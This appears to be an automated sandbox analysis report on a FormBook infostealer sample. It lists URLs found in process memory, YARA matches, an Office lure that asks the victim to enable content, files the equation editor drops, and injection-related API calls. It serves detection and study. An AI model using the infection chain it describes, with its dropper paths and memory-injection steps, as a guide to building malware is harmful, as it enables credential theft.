          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2194316905.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.in/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.br/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.cz/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.de/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.es/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.fr/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.it/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.pl/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.ru/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.si/
          Source: vbc.exe, 00000004.00000002.2178642047.0000000000910000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2193008298.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
          Source: vbc.exe, 00000004.00000002.2179124238.0000000000AF7000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2193231834.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 00000008.00000000.2194316905.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
          Source: vbc.exe, 00000004.00000002.2178642047.0000000000910000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2193008298.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.orange.fr/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
          Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmpString found in binary or memory: http://www.paletciniz.com/
          Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmpString found in binary or memory: http://www.paletciniz.com/2019/08/
          Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmpString found in binary or memory: http://www.paletciniz.com/2019/08/creative-portfolio-freelance/
          Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmpString found in binary or memory: http://www.paletciniz.com/2019/08/creative-portfolio-my-creative-cv/
          Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmpString found in binary or memory: http://www.paletciniz.com/2019/08/creative-portfolio-new-logo-concept/
          Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmpString found in binary or memory: http://www.paletciniz.com/2020/08/
          Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmpString found in binary or memory: http://www.paletciniz.com/2020/08/hello-world/
          Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmpString found in binary or memory: http://www.paletciniz.com/2020/08/hello-world/#comment-1
          Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmpString found in binary or memory: http://www.paletciniz.com/category/uncategorized/
          Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmpString found in binary or memory: http://www.paletciniz.com/comments/feed/
          Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmpString found in binary or memory: http://www.paletciniz.com/d41d8-about/
          Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmpString found in binary or memory: http://www.paletciniz.com/d41d8-blog/
          Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmpString found in binary or memory: http://www.paletciniz.com/d41d8-contact/
          Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmpString found in binary or memory: http://www.paletciniz.com/d41d8-portfolio-single/
          Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmpString found in binary or memory: http://www.paletciniz.com/d41d8-portfolio/
          Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmpString found in binary or memory: http://www.paletciniz.com/feed/
          Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmpString found in binary or memory: http://www.paletciniz.com/wp-json/
          Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmpString found in binary or memory: http://www.paletciniz.com/wp-login.php
          Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmpString found in binary or memory: http://www.paletciniz.com/xmlrpc.php?rsd
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
          Source: explorer.exe, 00000008.00000000.2192884231.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000008.00000002.2389413507.0000000000260000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193008298.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
          Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico
          Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmpString found in binary or memory: https://api.w.org/
          Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmpString found in binary or memory: https://secureservercdn.net
          Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmpString found in binary or memory: https://secureservercdn.net/160.153.138.53/ovz.d03.myftpupload.com/wp-content/plugins/coblocks/dist/
          Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmpString found in binary or memory: https://secureservercdn.net/160.153.138.53/ovz.d03.myftpupload.com/wp-content/plugins/kioken-blocks/
          Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmpString found in binary or memory: https://secureservercdn.net/160.153.138.53/ovz.d03.myftpupload.com/wp-content/plugins/otter-blocks/v
          Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmpString found in binary or memory: https://secureservercdn.net/160.153.138.53/ovz.d03.myftpupload.com/wp-content/themes/neve/assets/js/
          Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmpString found in binary or memory: https://secureservercdn.net/160.153.138.53/ovz.d03.myftpupload.com/wp-content/themes/neve/style.min.
          Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmpString found in binary or memory: https://secureservercdn.net/160.153.138.53/ovz.d03.myftpupload.com/wp-content/uploads/2020/08/croppe
          Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmpString found in binary or memory: https://secureservercdn.net/160.153.138.53/ovz.d03.myftpupload.com/wp-includes/css/dist/block-librar
          Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmpString found in binary or memory: https://secureservercdn.net/160.153.138.53/ovz.d03.myftpupload.com/wp-includes/js/jquery/jquery.js?v
          Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmpString found in binary or memory: https://secureservercdn.net/160.153.138.53/ovz.d03.myftpupload.com/wp-includes/js/jquery/ui/core.min
          Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmpString found in binary or memory: https://secureservercdn.net/160.153.138.53/ovz.d03.myftpupload.com/wp-includes/js/jquery/ui/datepick
          Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmpString found in binary or memory: https://secureservercdn.net/160.153.138.53/ovz.d03.myftpupload.com/wp-includes/js/wp-embed.min.js?ve
          Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmpString found in binary or memory: https://secureservercdn.net/160.153.138.53/ovz.d03.myftpupload.com/wp-includes/wlwmanifest.xml?time=
          Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmpString found in binary or memory: https://themeisle.com/themes/neve/
          Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmpString found in binary or memory: https://wordpress.org/

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000009.00000002.2389315305.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2389221261.0000000000070000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2389348504.0000000000240000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2215222613.0000000000170000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2179579442.0000000000EA8000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2215291644.00000000002B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2215328255.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 6.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.e90000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000009.00000002.2389315305.00000000001D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.2389315305.00000000001D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.2389221261.0000000000070000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.2389221261.0000000000070000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.2389348504.0000000000240000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.2389348504.0000000000240000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.2215222613.0000000000170000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.2215222613.0000000000170000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2179579442.0000000000EA8000.00000004.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2179579442.0000000000EA8000.00000004.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.2215291644.00000000002B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.2215291644.00000000002B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.2215328255.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.2215328255.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.vbc.exe.e90000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.vbc.exe.e90000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
          Source: Screenshot number: 4Screenshot OCR: document is protected 17 18 19 20 21 Open the document m If INS documcn: was 22 Mkrosoft Offkc
          Office equation editor drops PE fileShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exeJump to dropped file
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00E91100 GetProcAddress,GetProcAddress,GetConsoleWindow,ShowWindow,RpcMgmtEpEltInqBegin,NtCreateSection,NtMapViewOfSection,CloseHandle,CallWindowProcW,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00419D60 NtCreateFile,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00419E10 NtReadFile,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00419E90 NtClose,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00419F40 NtAllocateVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00419E0A NtReadFile,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00419E8F NtClose,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_008500C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00850048 NtProtectVirtualMemory,LdrInitializeThunk,
